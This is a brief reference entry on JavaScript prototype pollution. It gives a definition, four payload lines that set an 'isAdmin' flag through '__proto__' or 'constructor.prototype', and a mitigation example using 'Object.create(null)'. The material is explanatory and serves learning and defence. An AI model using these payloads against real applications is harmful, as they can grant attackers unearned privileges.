Prototype Pollution

Definition

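Prototype pollution is a JavaScript vulnerability in which an attacker modifies the prototype of a built-in object, typically Object.prototype. Because objects inherit from that prototype, the injected property appears on every object that does not define it itself, which can lead to unintended side effects or behavior in applications that rely on those objects.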

Payloads

obj.__proto__.isAdmin = true;
obj["__proto__"]["isAdmin"] = true;

obj.constructor.prototype.isAdmin = true;
obj["constructor"]["prototype"]["isAdmin"] = true;

Mitigation

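Once Object.prototype has been polluted, an ordinary object literal inherits the injected property, while an object created with a null prototype has no prototype chain and does not:

({}).isAdmin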
=> true

Object.create(null).isAdmin
=> undefined

Resources